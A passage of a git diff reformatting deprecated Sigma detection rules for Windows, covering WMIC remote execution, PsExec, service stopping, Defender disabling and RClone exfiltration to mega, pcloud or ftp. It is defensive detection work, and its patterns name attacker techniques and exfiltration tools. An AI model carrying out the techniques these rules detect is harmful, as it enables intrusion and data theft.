b/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml index 58c7338ba..74de89438 100644 --- a/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml +++ b/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security schtasks: - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe option: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create ' - \AppData\Local\Temp filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml condition: process_creation and (schtasks and option and not 1 of filter_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_service_stop.yml b/sigma/builtin/deprecated/proc_creation_win_service_stop.yml index f2e7e4a42..8c760ed60 100644 --- a/sigma/builtin/deprecated/proc_creation_win_service_stop.yml +++ b/sigma/builtin/deprecated/proc_creation_win_service_stop.yml @@ -16,30 +16,29 @@ detection: EventID: 4688 Channel: Security selection_sc_net_img: - - OriginalFileName: - - sc.exe - - net.exe - - net1.exe - - NewProcessName|endswith: - - \sc.exe - - \net.exe - - \net1.exe + - OriginalFileName: + - sc.exe + - net.exe + - net1.exe + - NewProcessName|endswith: + - \sc.exe + - \net.exe + - \net1.exe selection_sc_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_pwsh: - CommandLine|contains: 'Stop-Service ' - NewProcessName|endswith: + CommandLine|contains: 'Stop-Service ' + NewProcessName|endswith: - \powershell.exe - \pwsh.exe filter: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - SubjectUserName|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - condition: process_creation and ((all of selection_sc_net* and not filter) or - selection_pwsh) + condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh) fields: - SubjectUserName - ComputerName diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml b/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml index 0e2bd1768..6ea020f40 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml @@ -1,8 +1,7 @@ title: Suspicious Bitstransfer via PowerShell id: cd5c8085-4070-4e22-908d-a5b3342deb74 status: deprecated -description: Detects transferring files from system on a server bitstransfer Powershell - cmdlets +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets references: - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: Austin Songer @austinsonger @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Get-BitsTransfer - Add-BitsFile - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe - \pwsh.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml index c759acaf8..7f71f3bf5 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml @@ -1,8 +1,7 @@ title: Suspicious Cmd Execution via WMI id: e31f89f7-36fb-4697-8ab6-48823708353b status: deprecated -description: Detects suspicious command execution (cmd) via Windows Management Instrumentation - (WMI) on a remote host. This could be indicative of adversary lateral movement. +description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. references: - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html author: Tim Rauch @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \\\\127.0.0.1\\ - NewProcessName|endswith: \cmd.exe + CommandLine|contains: \\\\127.0.0.1\\ + NewProcessName|endswith: \cmd.exe ParentProcessName|endswith: \WmiPrvSE.exe selection_opt: - CommandLine|contains: + CommandLine|contains: - 2>&1 - 1> condition: process_creation and (all of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml b/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml index 26103cc6d..ca6ecabd8 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml @@ -1,8 +1,7 @@ title: Suspicious Characters in CommandLine id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 status: deprecated -description: Detects suspicious Unicode characters in the command line, which could - be a sign of obfuscation or defense evasion +description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation author: Florian Roth (Nextron Systems) @@ -18,18 +17,18 @@ detection: EventID: 4688 Channel: Security selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml index b824f4e5f..cb7b132a3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml @@ -1,8 +1,7 @@ title: Wscript Execution from Non C Drive id: 5b80cf53-3a46-4adc-960b-05ec19348d74 status: deprecated -description: Detects Wscript or Cscript executing from a drive other than C. This - has been observed with Qakbot executing from within a mounted ISO file. +description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. references: - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ @@ -20,25 +19,25 @@ detection: EventID: 4688 Channel: Security selection_lolbin: - NewProcessName|endswith: + NewProcessName|endswith: - \wscript.exe - \cscript.exe selection_exetensions: - CommandLine|contains: + CommandLine|contains: - .js - .vbs - .vbe selection_drive_path: - CommandLine|contains: :\ + CommandLine|contains: :\ filter_drive_path: - CommandLine|contains: + CommandLine|contains: - ' C:\\' - - ' ''C:\' + - " 'C:\\" - ' "C:\\' filter_env_vars: - CommandLine|contains: '%' + CommandLine|contains: '%' filter_unc_paths: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Legitimate scripts located on other partitions such as "D:" diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml b/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml index f15547ab0..4509714ea 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_run_folder.yml @@ -1,8 +1,7 @@ title: Process Start From Suspicious Folder id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b status: deprecated -description: Detects process start from rare or uncommon folders like temporary folder - or folders that usually don't contain executable files +description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files references: - Malware sandbox results author: frack113 @@ -19,24 +18,23 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \Desktop\ - \Temp\ - \Temporary Internet filter_parent: - - ParentProcessName: - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe - - C:\Windows\System32\dxgiadaptercache.exe - - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\ + - ParentProcessName: + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe + - C:\Windows\System32\dxgiadaptercache.exe + - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\ filter_other: - NewProcessName|endswith: setup.exe + NewProcessName|endswith: setup.exe filter_edge: - NewProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\ - NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe + NewProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\ + NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" - directories + - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories level: low ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml index d37d0cf2f..be453a803 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml @@ -20,32 +20,32 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \update.exe + NewProcessName|endswith: \update.exe selection2: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_discord: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_teams: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml index 539502df1..ef3efe58e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml @@ -1,8 +1,8 @@ title: PsExec Tool Execution id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: deprecated description: Detects PsExec service execution via default service image name references: @@ -23,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \PSEXESVC.exe - SubjectUserName|contains: + NewProcessName|endswith: \PSEXESVC.exe + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection diff --git a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml index d68e081fb..2e5894547 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml @@ -17,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: C:\Windows\PSEXESVC.exe + CommandLine: C:\Windows\PSEXESVC.exe condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml b/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml index cad621d79..a45f1cabd 100644 --- a/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml +++ b/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml @@ -1,8 +1,7 @@ title: Run Whoami as SYSTEM id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 status: deprecated -description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of - a successful local privilege escalation. +description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov, Florian Roth @@ -20,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - OriginalFileName: whoami.exe - - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe condition: process_creation and (all of selection*) falsepositives: - Possible name overlap with NT AUHTORITY substring to cover all languages diff --git a/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml b/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml index 01e7b0038..1ea5ae2e7 100644 --- a/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml +++ b/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml @@ -15,8 +15,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /l - NewProcessName|endswith: \winword.exe + CommandLine|contains: /l + NewProcessName|endswith: \winword.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml index f0b9167ba..9ce7b16a3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml @@ -1,13 +1,12 @@ title: WMI Execution Via Office Process id: 518643ba-7d9c-4fa5-9f37-baed36059f6a related: - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: similar + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: similar status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -28,8 +27,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_parent: ParentProcessName|endswith: - \winword.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml index 8226439f0..9ef16d68a 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - process - call diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml index 807b4711a..a4b6c7189 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml @@ -1,19 +1,11 @@ title: WMI Reconnaissance List Remote Services id: 09af397b-c5eb-4811-b2bb-08b3de464ebf status: deprecated -description: 'An adversary might use WMI to check if a certain Remote Service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain Remote Service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -31,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - service condition: process_creation and (all of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml b/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml index d5ff16746..7a4d54c9a 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml @@ -20,15 +20,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - NewProcessName|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /UpdateDeploymentProvider - /RunHandlerComServer - .dll filter: - CommandLine|contains: + CommandLine|contains: - ' /ClassId ' - ' wuaueng.dll ' condition: process_creation and (all of selection* and not filter) diff --git a/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml b/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml index ae6db4c09..f8cdc01f9 100644 --- a/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -1,10 +1,9 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: fde7929d-8beb-4a4c-b922-be9974671667 -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/04/11 tags: @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \SyncAppvPublishingServer.exe + NewProcessName|endswith: \SyncAppvPublishingServer.exe condition: process_creation and selection falsepositives: - App-V clients diff --git a/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml index a826142f5..85fd9ba57 100644 --- a/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml +++ b/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml @@ -1,8 +1,7 @@ title: Sysinternals SDelete Registry Keys id: 9841b233-8df8-4ad7-9133-b0b4402a9014 status: deprecated -description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete - registry keys. Indicators of the use of Sysinternals SDelete tool. +description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md @@ -20,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \Software\Sysinternals\SDelete condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml b/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml index 7cc987ba5..4469a5721 100644 --- a/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml +++ b/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml @@ -5,11 +5,10 @@ status: deprecated references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 modified: 2022/05/14 -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton logsource: category: registry_event product: windows @@ -191,25 +190,17 @@ detection: - \Lsa\Authentication Packages - \BootVerificationProgram\ImagePath filter: - - NewValue: (Empty) - - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount - - ProcessName: C:\WINDOWS\System32\svchost.exe - condition: registry_event and (( main_selection or session_manager_base and session_manager - or current_version_base and current_version or nt_current_version_base and - nt_current_version or wow_current_version_base and wow_current_version or - wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) - and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base - and wow_classes or classes_base and classes or scripts_base and scripts or - winsock_parameters_base and winsock_parameters or system_control_base and - system_control ) and not filter) + - NewValue: (Empty) + - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount + - ProcessName: C:\WINDOWS\System32\svchost.exe + condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason tags: - attack.persistence diff --git a/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml index 9319a2035..67a5cd103 100644 --- a/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml +++ b/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml @@ -1,16 +1,10 @@ title: Abusing Windows Telemetry For Persistence - Registry id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: deprecated -description: 'Windows telemetry makes use of the binary CompatTelRunner.exe to run - a variety of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman diff --git a/sigma/builtin/deprecated/registry_set_add_hidden_user.yml b/sigma/builtin/deprecated/registry_set_add_hidden_user.yml index 357655b1f..1d17dbb89 100644 --- a/sigma/builtin/deprecated/registry_set_add_hidden_user.yml +++ b/sigma/builtin/deprecated/registry_set_add_hidden_user.yml @@ -1,8 +1,7 @@ title: User Account Hidden By Registry id: 8a58209c-7ae6-4027-afb0-307a78e4589a status: deprecated -description: Detect modification for a specific user to prevent that user from being - listed on the logon screen +description: Detect modification for a specific user to prevent that user from being listed on the logon screen references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md author: frack113 diff --git a/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml b/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml index 0431ea3be..5092d1a09 100644 --- a/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml +++ b/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml @@ -16,6 +16,11 @@ logsource: product: windows category: registry_set definition: key must be add to the sysmon configuration to works + # Sysmon + # \VBAWarnings + # \DisableInternetFilesInPV + # \DisableUnsafeLocationsInPV + # \DisableAttachementsInPV detection: registry_set: EventID: 4657 diff --git a/sigma/builtin/deprecated/registry_set_office_security.yml b/sigma/builtin/deprecated/registry_set_office_security.yml index 5996d751f..10c849c8c 100644 --- a/sigma/builtin/deprecated/registry_set_office_security.yml +++ b/sigma/builtin/deprecated/registry_set_office_security.yml @@ -1,8 +1,7 @@ title: Office Security Settings Changed id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd status: deprecated -description: Detects registry changes to Office macro settings. The TrustRecords contain - information on executed macro-enabled documents. (see references) +description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/builtin/deprecated/registry_set_silentprocessexit.yml b/sigma/builtin/deprecated/registry_set_silentprocessexit.yml index c24a60258..3bd64f404 100644 --- a/sigma/builtin/deprecated/registry_set_silentprocessexit.yml +++ b/sigma/builtin/deprecated/registry_set_silentprocessexit.yml @@ -1,8 +1,7 @@ title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 status: deprecated -description: Detects changes to the Registry in which a monitor program gets registered - to monitor the exit of another process +description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/builtin/deprecated/sysmon_rclone_execution.yml b/sigma/builtin/deprecated/sysmon_rclone_execution.yml index ee9fa7287..154a30bb2 100644 --- a/sigma/builtin/deprecated/sysmon_rclone_execution.yml +++ b/sigma/builtin/deprecated/sysmon_rclone_execution.yml @@ -1,8 +1,7 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c status: deprecated -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration - attack.t1567.002 @@ -31,12 +30,12 @@ detection: selection: Description: Rsync for cloud storage selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection3: - CommandLine|contains: + CommandLine|contains: - mega - pcloud - ftp @@ -45,7 +44,7 @@ detection: - --auto-confirm - --transfers - --multi-thread-streams - NewProcessName|endswith: + NewProcessName|endswith: - \rclone.exe condition: process_creation and (1 of selection*) ruletype: Sigma diff --git a/sigma/builtin/deprecated/win_defender_disabled.yml b/sigma/builtin/deprecated/win_defender_disabled.yml index 2c2faf229..475ab593b 100644 --- a/sigma/builtin/deprecated/win_defender_disabled.yml +++ b/sigma/builtin/deprecated/win_defender_disabled.yml @@ -5,7 +5,7 @@ description: Detects disabling Windows Defender threat protection references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -19,10 +19,10 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 5001 - - 5010 - - 5012 - - 5101 + - 5001 # Real-time protection is disabled. + - 5010 # Scanning for malware and other potentially unwanted software is disabled. + - 5012 # Scanning for viruses is disabled. + - 5101 # The antimalware platform is expired. condition: windefend and selection falsepositives: - Administrator actions (should be investigated) diff --git a/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml b/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml index 9c5f2481b..7d51fcd47 100644 --- a/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml +++ b/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml @@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - -filter - - trustedDomain - NewProcessName|endswith: \dsquery.exe - - 